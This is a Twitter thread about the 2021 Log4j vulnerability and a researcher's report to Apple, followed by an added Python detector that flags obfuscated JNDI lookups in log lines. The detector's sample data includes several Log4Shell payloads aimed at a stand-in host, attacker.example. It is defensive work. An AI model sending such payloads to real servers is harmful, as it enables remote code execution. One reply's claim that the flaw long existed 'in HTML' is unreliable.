A story in three parts 🙈 #log4j
Disclaimer: I'm fairly sure I'm not the first one to have tried this, but I flagged it with Apple's product security team either way. I'm sure they are busy enough patching their systems 😅
Disclaimer²: Normally I wouldn't share such vulns before the vendor has had a chance to mitigate. However, I chose differently in this case because 1) the issue is already very widespread, 2) I likely wasn't the first one to tell Apple, and 3) it's a prime example of how deep this goes.

Dec 10, 2021 · 4:39 PM UTC · Twitter Web App

Replying to @chvancooten
This is the story from 3 months ago.
Replying to @chvancooten
Normally the feds would not bust people for showing the exploitation of widespread vulns on Twitter. However, they might choose to do it differently this time, just because this time they have proof of the criminal offense.
This vulnerability has existed for decades in HTML; how has nobody tried it in Java before now?
Replying to @chvancooten
Don't forget 4) There are already bots actively seeking exploitable targets right now, it's an active exploit.
Replying to @chvancooten
Would you mind explaining it like you would to your nephew? 😅
My layman's understanding: Apache Log4j is a widely-used, free, volunteer-made tool for logging things that happened on your computer. Turns out they made a REALLY big whoopsie: if you send computer code to a computer using log4j, log4j will just run that code no questions asked.
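To make the "send it a string and it runs code" explanation above concrete from the defender's side: the Log4Shell trigger (CVE-2021-44228) is a logged string containing a `${jndi:...}` lookup, and scanners routinely hide the `jndi` keyword behind nested lookups such as `${lower:j}` or `${::-j}`. The following is an added example, not code from the thread or from the Log4j project; it normalizes those nesting tricks and then flags lookups in constructed web-server log lines. The log lines, hostnames (`attacker.example`) and the set of protocols are assumptions chosen for illustration.

```python
import re

# Constructed sample access-log lines (not captured from any real system).
# The last field is the User-Agent, a common place for the payload to land.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://attacker.example/b}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:ldaps://attacker.example/d}"',
    '10.0.0.4 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# Innermost lookups that collapse to a literal: ${lower:x}, ${upper:x},
# and the default-value form ${<lookup>:<key>:-x} (e.g. ${::-j}, ${env:NOPE:-j}).
# Character class [^${}] keeps each match to a single, non-nested lookup.
_LITERAL_LOOKUP = re.compile(
    r'\$\{\s*(?:(lower|upper)\s*:\s*([^${}]*?)'
    r'|(?:[a-zA-Z]*(?::[^${}:]*)?)?:-([^${}]*?))\s*\}'
)

# After normalization, a JNDI lookup with one of the protocols seen in the wild.
_JNDI = re.compile(
    r'\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:',
    re.IGNORECASE,
)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly replace innermost obfuscating lookups with their literal value.

    Nested payloads resolve from the inside out, so several rounds may be
    needed; max_rounds bounds the work on adversarial input.
    """
    def _resolve(m: re.Match) -> str:
        if m.group(1) == 'lower':
            return m.group(2).lower()
        if m.group(1) == 'upper':
            return m.group(2).upper()
        return m.group(3)  # default value after ":-"

    for _ in range(max_rounds):
        new_text = _LITERAL_LOOKUP.sub(_resolve, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi_lookup(line: str):
    """Return the lookup protocol (e.g. 'ldap') if the line carries a JNDI
    lookup, otherwise None."""
    m = _JNDI.search(normalize_lookups(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (index, protocol, line) for every line that triggers detection."""
    hits = []
    for i, line in enumerate(lines):
        proto = find_jndi_lookup(line)
        if proto:
            hits.append((i, proto, line))
    return hits


if __name__ == '__main__':
    for idx, proto, line in scan(SAMPLE_LOG_LINES):
        print(f'line {idx}: jndi/{proto}: {line}')
```

Two caveats a practitioner would add: this is a log-search heuristic for triage, not a fix (the fix is upgrading Log4j 2 or removing the JndiLookup class), and it only resolves the lookup forms spelled out in `_LITERAL_LOOKUP`; other lookup types with a `:-` default are covered, but a payload using a different transformation would need its own rule.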